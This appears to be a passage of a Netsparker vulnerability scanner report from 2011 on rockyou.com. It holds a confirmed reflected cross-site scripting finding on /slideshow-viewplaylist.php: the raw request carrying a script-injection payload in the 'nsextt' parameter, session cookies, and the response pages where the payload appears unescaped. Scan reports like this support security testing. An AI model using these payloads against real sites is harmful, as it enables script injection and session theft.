var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "'"--></style></script><script>netsparker(0x000FA9)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000FA9)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed..
|
- /slideshow-viewplaylist.php
/slideshow-viewplaylist.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| instanceid | GET | 117242930 |
| nsextt | GET | '"--></style></script><script>alert(0x000FF6)</script> |
Request
GET /slideshow-viewplaylist.php?instanceid=117242930&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000FF6)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164712; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164712; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:11:53 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:11:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303164713; expires=Wed, 27-Jul-2011 22:11:53 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:11:53 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29531 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4690
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="js/embeds.js?ver=4" type="text/javascript"></script><script src="js/music-embeds.js?ver=1" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initPage();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<script>
var thisinstanceid = '117242930';
membed = new musicEmbed(-1);
var curSong = -1;
function initPage()
{
//refreshMusic(-1);
embed = new appEmbed(thisinstanceid);
embed.noSound=true;
embed.insertEmbed("viewslideshow");
embed.setPixelSize(300,200);
}
function refreshMusic(id)
{
membed.insertEmbed('music-player');
}
function previewSong(url,cnt)
{
if (membed.songUrl!=url)
{
membed.songUrl=url;
document.getElementById('playicon-'+cnt).src='/images/icon-stopbig.gif';
if (curSong >= 0) document.getElementById('playicon-'+curSong).src='/images/icon-playbig.gif';
}
else
{
if (membed.songUrl==url)
{
document.getElementById('playicon-'+cnt).src='/images/icon-playbig.gif';
}
membed.songUrl="";
curSong=-1;
}
membed.stop = false;
curSong = cnt;
refreshMusic(-1);
}
function loadingSong()
{
}
function CopyToClipboard()
{
var e = document.getElementById("slidecontent");
e.focus();
e.select();
document.selection.createRange().execCommand("Copy");
}
</script>
<table><tr><td valign="top" >
<div style="position:relative">
<div id="viewslideshow" style="margin-left: 10px; border:1px solid #cccccc;"></div>
</div>
<div style="float:right;display:inline"><a href="show_my_gallery.php?instanceid=117242930">View Full Show</a></div>
<div style="clear:both"></div>
<div style="background-color:#e9e8e8;border:solid #aaa 1px;width:340px;margin-top:10px;margin-left:11px;padding-top:3px" align="center">
<strong>Embed Code</strong><br />
<textarea id="slidecontent" wrap="hard" onClick="this.focus(); this.select();" style="margin:2px auto 5px auto;border: solid 1px #aaa;background:#fff;font-size:12px;font-family:Arial, Helvetica, sans-serif; height:50; color:#666; width: 300px; overflow:hidden;"><embed src="http://apps.rockyou.com/rockyou.swf?instanceid=117242930" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/><br><img src="http://apps.rockyou.com/dot.gif"><a target="_BLANK" href="http://www.rockyou.com?type=slideshow&refid=117242930"><img title="RockYou slideshow" src="http://apps.rockyou.com/images/logo-mini.gif" border="0"></a> <a target="_BLANK" href="http://www.rockyou.com/slideshow-create.php?source=cyo&refid=117242930">Create Your Own</a><a style="padding-right:0px;" target="_BLANK" href=" http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930"><img style="border:0px;" src="http://apps.rockyou.com/images/tail_playlist.gif "></a></textarea>
<br />
<a href="javascript: CopyToClipboard();"><img src="images/rockyou_music-copybutton.jpg" style="margin-bottom:7px" /></a>
<!--br><center><a onclick="urchinTracker ('/links/viewplaylist/slideshowcreate')" href="/slideshow-create.php?source=svp"><img src="/images/button-createslideshow-big.gif"></a></center1-->
</td><td valign="top">
<div style="font-weight: bold; font-size:24px;font-family: arial;">
<img src='images/rockyou_music-banner.jpg'>
<p style="margin:10px 0px 0px 0px;">Song Playlist</div>
<table width='450px'><tr style='background-color:#e9e8e8;'><td>1</td><td style='width: 80px; height:80px;'><div style='position:relative'><a href='javascript:previewSong("http://apps.rockyou.com/music/0/0/4/492.mp3",1);'><img height='80' src='http://apps.rockyou.com/images/spacer.gif'><img id='playicon-1' style='position:absolute;left:20px;top:20px;' src='/images/icon-playbig.gif'></a></div></td><td><b style='font-size: 18px;'>Chicken Fried</b><br>Zac Brown Band<br /><br /><a onclick='urchinTracker("/links/viewplaylist/492");' href='/music/music_slideshow_create.php?songid=492'>Get This Song in a Slideshow</a></td></tr></table><div style='text-align:right;margin-top:5px;'>
<img src="/images/logos/snocap.png" style="border:1px solid #CCCCCC">
<img src="/images/bebo-bands-logo.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-nettwerk.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-pumpaudio.jpg" style="border:1px solid #CCCCCC">
</div>
</td></tr></table><div id='music-player'></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
</div>
<style>
.footmenublk:link {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:visited {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:active {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:hover {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
</style>
<br><br>
<div class="tp"><span style="color:#CCCCCC">
Copyright © 2007 RockYou | <a target="_BLANK" href="/help" class="footmenublk">FAQ / Help</a> | <a target="_BLANK" href="/privacypolicy.php" class="footmenublk">Privacy</a> | <a href="/tos.php" target=_blank class="footmenublk">Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank" class="footmenublk">Facebook Advertisers</a> | <a href="/corp/facebook/dev.php" target="_blank" class="footmenublk">Facebook Developers</a> | <a href="/corp/about.php" target=_blank class="footmenublk">About Us</a></span></div>
<div class="tp">
| <a href="?lang=en&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">English</a> | <a href="?lang=zh&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">中文</a> | <a href="?lang=es&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">Español | <a href="?lang=pt&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">Português</a></a>
</div>
<br>
<br>
<script language="javascript">
if (navigator.cookieEnabled && document.cookie.indexOf('AAMBLFLAG=') == -1) {
var blTomorrow = new Date();
blTomorrow.setTime(blTomorrow.getTime() + 86400000);
document.cookie = 'AAMBLFLAG=SET; expires=' + blTomorrow.toGMTString();
if (document.cookie.indexOf('AAMBLFLAG=') > -1)
document.writeln('<iframe src="http://aps.media..
Date: Mon, 18 Apr 2011 22:11:53 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:11:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303164713; expires=Wed, 27-Jul-2011 22:11:53 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:11:53 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29531 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4690
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
